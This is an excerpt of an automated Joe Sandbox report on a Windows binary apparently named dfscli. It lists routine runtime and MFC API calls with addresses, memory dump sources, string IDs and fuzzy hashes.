• Instruction Fuzzy Hash: AD215E74A026179AE321AF27BDC452EBAF4F6487403E4543FD404E22D0D73954868F9E
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 004124A2
• _strcat.LIBCMT ref: 004124B5
• _strlen.LIBCMT ref: 004124C2
• _strlen.LIBCMT ref: 004124D1
• _strncpy.LIBCMT ref: 004124E8
• _strlen.LIBCMT ref: 004124F1
• _strlen.LIBCMT ref: 004124FE
• _strcat.LIBCMT ref: 0041251C
• _strlen.LIBCMT ref: 00412564
• GetStdHandle.KERNEL32(000000F4,00431F70,00000000,?,00000000,00000000,00000000,00000000), ref: 0041256F
• WriteFile.KERNEL32(00000000), ref: 00412576
Strings
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3601721357-4022980321
• Opcode ID: 33eba8a56c94104930c01ea856345e6cd8f8d6e67629feebce46de6d582aadf8
• Instruction ID: 13021548b91ef27835def0d839a72f5b902c9013898fcf24966e2a0fbd176725
• Instruction Fuzzy Hash: 1B317B72640114ABDB24ABB9DCC1FEB3369EB44318F10082FF555E3192DE7CA4A5872C
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,004321C0,00000118,0040EA00,00000001,00000000,00431A80,00000008,0041258D,00000000,00000000,00000000), ref: 00412EF6
• _strcat.LIBCMT ref: 00412F0C
• _strlen.LIBCMT ref: 00412F1C
• _strlen.LIBCMT ref: 00412F2D
• _strncpy.LIBCMT ref: 00412F47
• _strlen.LIBCMT ref: 00412F50
• _strcat.LIBCMT ref: 00412F6C
Strings
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: _strlen$_strcat$FileModuleName_strncpy
• String ID: ( C$...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
• API String ID: 3058806289-1906809315
• Opcode ID: 54b1497dfd563ac8debf3ed2c16c48730149fe1c51b89dfeef04513612d6689f
• Instruction ID: dc0b60b2e2fa07aa48be410cc1825f31972f92912820f319277543dbe6ba90b6
• Instruction Fuzzy Hash: 2931EC719012146BDB11AB61AD82ECE3668DF0A324F10046FF114F72D2DBBCDA954BAD
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,76230A60,00000000,0040E8F2,?,00431A70,00000060), ref: 00411F75
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00411F8D
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00411F9A
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00411FA7
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00411FB4
• FlsAlloc.KERNEL32(00411E16,?,00431A70,00000060), ref: 00411FF1
• FlsSetValue.KERNEL32(00000000,?,00431A70,00000060), ref: 0041201E
• GetCurrentThreadId.KERNEL32 ref: 00412032
  • Part of subcall function 00411D88: FlsFree.KERNEL32(00000006,00412047,?,00431A70,00000060), ref: 00411D93
Strings
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
• String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$`#vp,$v$kernel32.dll
• API String ID: 2355849793-3083462466
• Opcode ID: 87445edb743fa6b159021db6ff6499874027bb5d5b45ed15fee1da4cd6f863fa
• Instruction ID: 94756841155c4855af9acbccb37cf424809e5c19bd57a04feacf727f30d0ec92
• Instruction Fuzzy Hash: 8E219270E01B109BD7209F36AC0AE567EE4EB94761710523BF400C22B0EB789887CF5C
APIs
• __EH_prolog.LIBCMT ref: 0040D240
• GetFocus.USER32 ref: 0040D269
• GetParent.USER32(?), ref: 0040D2BE
• GetParent.USER32(?), ref: 0040D2CE
• GetKeyState.USER32(00000012), ref: 0040D386
• IsDialogMessageA.USER32(?,?,?,?,?,00000000), ref: 0040D435
• GetFocus.USER32 ref: 0040D447
• GetFocus.USER32 ref: 0040D454
  • Part of subcall function 004043DD: GetNextDlgTabItem.USER32(?,?,?), ref: 004043F0
• IsWindow.USER32(?), ref: 0040D46C
• GetFocus.USER32 ref: 0040D478
• IsWindow.USER32(?), ref: 0040D48E
• GetFocus.USER32 ref: 0040D494
• GetKeyState.USER32(00000010), ref: 0040D4C5
• MessageBeep.USER32(00000000), ref: 0040D5BC
• SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 0040D6A3
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: Focus$Message$ParentStateWindow$BeepDialogH_prologItemNextSend
• String ID:
• API String ID: 2999224188-0
• Opcode ID: 3f0161c52a8131cff4d874affb24284938a97bd9b6013c2c61ed968d9b0ac3a0
• Instruction ID: 35367725a961e0762c2cabb331062711e07683ca912c259f6d9a903d8a3fc05f
• Instruction Fuzzy Hash: 07C19030E002159BDF20AFA5C885ABFBBB5AF54354F54443BE805B72D1C73DAC89CA5A
APIs
• LoadLibraryA.KERNEL32(user32.dll,00431FC0,?,?), ref: 00416BBB
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00416BD7
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00416BE8
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00416BF5
• GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00416C0B
• GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00416C1C
Strings
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
• API String ID: 2238633743-1612076079
• Opcode ID: 9e327152f9d207da8eb992561a812df92acea30e061754a633c313ec85e84a5e
• Instruction ID: 84e52e513d7d4be0df6fc3aa4f30dfd75f48eeac0b79a234e46bab85f2138aa6
• Instruction Fuzzy Hash: CA21A7B1A00306ABDB249F659E85FBB3BECDB48740B15103AE945C2250F778D984D7AD
APIs
• __EH_prolog.LIBCMT ref: 0042B96E
• lstrlenA.KERNEL32(?,?,?), ref: 0042B9A8
• VariantClear.OLEAUT32(?), ref: 0042BC3B
• VariantClear.OLEAUT32(?), ref: 0042BC62
• SysFreeString.OLEAUT32(?), ref: 0042BCC6
• SysFreeString.OLEAUT32(?), ref: 0042BCDB
• SysFreeString.OLEAUT32(?), ref: 0042BCF0
• VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0042BD28
• VariantClear.OLEAUT32(?), ref: 0042BD38
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
• String ID:
• API String ID: 344392101-0
• Opcode ID: 089186b2475cb69903ae3bdd73d4d94893396a00b302e6d1bc5308c4256f1ad2
• Instruction ID: 7c280d155deaacb0d062ce9fde7c5bc633f2178c496f6d30549a061dd8c1b599
• Instruction Fuzzy Hash: 59E1AE71A00219DFDF10DFA9E880AEEBBB5FF05300F54442AE951A7250D738AD52CFA9
APIs
  • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
• GetParent.USER32(?), ref: 00421696
• SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004216B9
• GetWindowRect.USER32(?,?), ref: 004216D2
• GetWindowLongA.USER32(00000000,000000F0), ref: 004216E5
• CopyRect.USER32(?,?), ref: 00421732
• CopyRect.USER32(?,?), ref: 0042173C
• GetWindowRect.USER32(00000000,?), ref: 00421745
• CopyRect.USER32(?,?), ref: 00421761
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: Rect$Window$Copy$Long$MessageParentSend
• String ID:
• API String ID: 808654186-0
• Opcode ID: 543d3be195253b833f47fdbe98b0e5ceab59b1d8d68aa360d95ee6028cc7d4e0
• Instruction ID: ef626137246b3df9443168ea5854a1867bc10e0d27b41f31f247ff74b2751243
• Instruction Fuzzy Hash: CB518471B00219AFDB10DBA9DD85FEEBBB9AF94314F590126F501F3290D638E9068B58
APIs
• GetVersionExA.KERNEL32(?,00431A70,00000060), ref: 0040E832
• GetModuleHandleA.KERNEL32(00000000,?,00431A70,00000060), ref: 0040E885
• _fast_error_exit.LIBCMT ref: 0040E8E7
• _fast_error_exit.LIBCMT ref: 0040E8F8
• GetCommandLineA.KERNEL32(?,00431A70,00000060), ref: 0040E917
• GetStartupInfoA.KERNEL32(?), ref: 0040E96B
• __wincmdln.LIBCMT ref: 0040E971
• GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040E98E
Strings
Memory Dump Source
• Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
Similarity
• API ID: HandleModule_fast_error_exit$CommandInfoLineStartupVersion__wincmdln
• String ID: P5`$`#vp,$v
• API String ID: 3897392166-2176719703
• Opcode ID: e1bf0c6c10a35e2feaa378b61d2a2dbd1c9d61abde69f1a15ddcab38a1182d4c
• Instruction ID: 0bc8d0c747b5be90a239dc1f6fd12c79bdb3a1e517c7b53da2822559ab0157a6
• Instruction Fuzzy Hash: E241B0B1D002109ADB20BF739D456AE77B0AF44718F24883FE415FB2D2DA7C88928B5D
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,00000100,004322C4,00000001,00000000,00000000,004322C8,00000038,0040FB6E,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00415239
                                                                  • GetLastError.KERNEL32 ref: 0041524B
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,0040FE1B,?,00000000,00000000,004322C8,00000038,0040FB6E,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 004152D2
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,0040FE1B,?,?,00000000), ref: 00415353
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041536D
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 004153A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1775797328-0
                                                                  • Opcode ID: 144a4794a36e381682c1608e6ad5055cd70a4332a4d33170656413dfc46b285a
                                                                  • Instruction ID: 5d6a1a971d9631bc273ea7c0213d5fa4ae4f756ba9487c2342617ad8996632df
                                                                  • Opcode Fuzzy Hash: 144a4794a36e381682c1608e6ad5055cd70a4332a4d33170656413dfc46b285a
                                                                  • Instruction Fuzzy Hash: 26B1AD72800509EFCF119FA1DC859EE7BB6FF48318F14452AF911A22A0D33989A1DF69
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00420573
                                                                  • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004205AB
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004205B3
                                                                    • Part of subcall function 00421E24: UnhookWindowsHookEx.USER32(?), ref: 00421E49
                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004205C5
                                                                  • GetDesktopWindow.USER32 ref: 004205F2
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00420600
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0042060F
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0042069E
                                                                  • GetActiveWindow.USER32 ref: 004206A9
                                                                  • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206B7
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                  • String ID:
                                                                  • API String ID: 833315621-0
                                                                  • Opcode ID: 9c049424f7e73ca1598ba7117b6125b43015b5989c775a291803d269f1ce4c2f
                                                                  • Instruction ID: dca9b540c62fcd184cdbaef0817d1578ed90b02519734c6228dfb65e1cce7a9d
                                                                  • Opcode Fuzzy Hash: 9c049424f7e73ca1598ba7117b6125b43015b5989c775a291803d269f1ce4c2f
                                                                  • Instruction Fuzzy Hash: 79418331B00325DFDB21AFA5E84976EBBF5AF44715F90042EE501B2292CB785942CA6D
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00422CFD
                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 00422D15
                                                                  • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 00422D73
                                                                    • Part of subcall function 004222C8: GetWindowRect.USER32(?,004223EA), ref: 004222ED
                                                                    • Part of subcall function 004222C8: GetWindow.USER32(?,00000004), ref: 0042230A
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00422DA3
                                                                  • RemovePropA.USER32(?,AfxOldWndProc423), ref: 00422DAB
                                                                  • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00422DB2
                                                                  • GlobalDeleteAtom.KERNEL32(00000000), ref: 00422DB9
                                                                    • Part of subcall function 00421338: GetWindowRect.USER32(?,?), ref: 00421344
                                                                  • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00422E0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                  • String ID: AfxOldWndProc423
                                                                  • API String ID: 2397448395-1060338832
                                                                  • Opcode ID: 42f8192bdfa06c4a61062a92c3b8c52fd31b5a38a69e1511a4050e6997e842b7
                                                                  • Instruction ID: d0d5fd2a95d0caff163bc92c540bc67e825ba57d28d602554495161fd341ab14
                                                                  • Opcode Fuzzy Hash: 42f8192bdfa06c4a61062a92c3b8c52fd31b5a38a69e1511a4050e6997e842b7
                                                                  • Instruction Fuzzy Hash: D0319632A0012ABFDB11AFA5ED49DFF7F78EF09311F80052AF501A1161C7789912DBA9
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,00421C6F,?,00040000), ref: 00421249
                                                                  • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00421252
                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00421266
                                                                  • #17.COMCTL32 ref: 00421281
                                                                  • #17.COMCTL32 ref: 0042129D
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004212AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                  • String ID: COMCTL32.DLL$InitCommonControlsEx$`#vp,$v
                                                                  • API String ID: 1437655972-2158789292
                                                                  • Opcode ID: e4adc865601357d86bd5e694327d93582044c89adc3814df3ac42751e02ffd74
                                                                  • Instruction ID: 95cf30dd8ce34ee92b00f566a42e8099b381b461292cc38c6bf4f8d75c531509
                                                                  • Opcode Fuzzy Hash: e4adc865601357d86bd5e694327d93582044c89adc3814df3ac42751e02ffd74
                                                                  • Instruction Fuzzy Hash: 9BF0A936B00222DB97215F66BD4861BB6ECAFA476175504B6F805F3330CB78DC06467D
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00431060), ref: 0042B6FD
                                                                    • Part of subcall function 004059C0: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 004059E2
                                                                  • SysAllocString.OLEAUT32(?), ref: 0042B729
                                                                  • lstrlenA.KERNEL32(?,00431060), ref: 0042B741
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B768
                                                                  • lstrlenA.KERNEL32(?,0000F108,?,00000100,004302DC,00431060), ref: 0042B7B6
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B7DF
                                                                  • lstrlenA.KERNEL32(?), ref: 0042B7FF
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B826
                                                                  • lstrlenA.KERNEL32(?), ref: 0042B84F
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B870
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 2903237683-0
                                                                  • Opcode ID: c0277fd87a20140d2149f3f34d2eb646c926a0dbb09a78b738232d21ded5d3b9
                                                                  • Instruction ID: 1a3153decd58b46bd6a0c121a40f0f3a120ecd19db3a4f9c7d82dc57bbc87be9
                                                                  • Opcode Fuzzy Hash: c0277fd87a20140d2149f3f34d2eb646c926a0dbb09a78b738232d21ded5d3b9
                                                                  • Instruction Fuzzy Hash: 54510472A00219EBCB20AF75DC85B9ABBB8FF48354F50452BE915D7281DB38D850CFA4
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0042097C
                                                                  • GetClassInfoA.USER32(?,?,?), ref: 00420997
                                                                  • RegisterClassA.USER32(?), ref: 004209AA
                                                                  • lstrlenA.KERNEL32(-00000034,00000001), ref: 004209E6
                                                                  • lstrlenA.KERNEL32(?), ref: 004209ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Classlstrlen$H_prologInfoRegister
                                                                  • String ID:
                                                                  • API String ID: 3690589370-0
                                                                  • Opcode ID: 306c1d9e215d0fabf92add2f6d1187e6e5450e128d1fc0b5e055ba4f64e6dba0
                                                                  • Instruction ID: 71e2a2145aac47898e1f733674852a82c0eca1208d8ef585954345c2e418f862
                                                                  • Opcode Fuzzy Hash: 306c1d9e215d0fabf92add2f6d1187e6e5450e128d1fc0b5e055ba4f64e6dba0
                                                                  • Instruction Fuzzy Hash: E531B171A00229EFDF11DF60ED45AAEBFF4FF08315F504126E805A2251C738DA51CBA9
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: _strcat$___shr_12
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                  • API String ID: 1152255961-4131533671
                                                                  • Opcode ID: 1738a10b470dc6ab355d8796a0499abadeee2c3cf96b2aae57927fffe5d3a795
                                                                  • Instruction ID: f879c1e990ddeebbe466094dc5d8ff8bd54ad08b32661d6171e75fd2fa4a4eb8
                                                                  • Opcode Fuzzy Hash: 1738a10b470dc6ab355d8796a0499abadeee2c3cf96b2aae57927fffe5d3a795
                                                                  • Instruction Fuzzy Hash: 8C81367180528A8ECF11CBA8C9447FF7BB4AF15314F09455BD850EB282D37C9695C3AB
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00420366
                                                                  • GetSystemMetrics.USER32(0000002A), ref: 0042042A
                                                                  • GlobalLock.KERNEL32(00000000,?,?,?,?), ref: 00420495
                                                                  • CreateDialogIndirectParamA.USER32(?,?,?,Function_0001FDFB,00000000), ref: 004204C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
